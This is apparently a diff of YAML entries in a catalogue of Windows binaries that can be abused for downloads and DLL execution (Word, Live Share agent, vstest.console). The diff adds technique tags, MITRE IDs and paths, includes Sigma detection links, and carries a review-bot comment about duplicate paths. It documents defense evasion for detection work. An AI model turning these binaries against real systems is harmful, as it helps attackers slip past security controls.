OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Download: INetCache
Full_Path: Full_Path:
- Path: C:\Program Files\Microsoft Office\root\Office16\winword.exe - Path: C:\Program Files\Microsoft Office\root\Office16\winword.exe
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe
@ -28,8 +30,6 @@ Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office\Office12\winword.exe - Path: C:\Program Files (x86)\Microsoft Office\Office12\winword.exe
- Path: C:\Program Files\Microsoft Office\Office12\winword.exe - Path: C:\Program Files\Microsoft Office\Office12\winword.exe
- Path: C:\Program Files\Microsoft Office\Office12\winword.exe - Path: C:\Program Files\Microsoft Office\Office12\winword.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml
- IOC: Suspicious Office application Internet/network traffic - IOC: Suspicious Office application Internet/network traffic
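Review bot: the context lines show `- Path: C:\Program Files\Microsoft Office\Office12\winword.exe` listed twice in Full_Path. Not part of this change, but worth deduplicating while the file is touched, since duplicate paths inflate any path-based detection list generated from these entries. The empty Code_Sample placeholder removal here matches the other files in this diff and should be covered by the same schema check.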

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10 21H2 (likely previous and newer versions with modern versions of Visual Studio installed) OperatingSystem: Windows 10 21H2 (likely previous and newer versions with modern versions of Visual Studio installed)
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\Extensions\Microsoft\LiveShare\Agent\vsls-agent.exe - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\Extensions\Microsoft\LiveShare\Agent\vsls-agent.exe
Detection: Detection:

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2022\TestAgent\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\2022\TestAgent\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe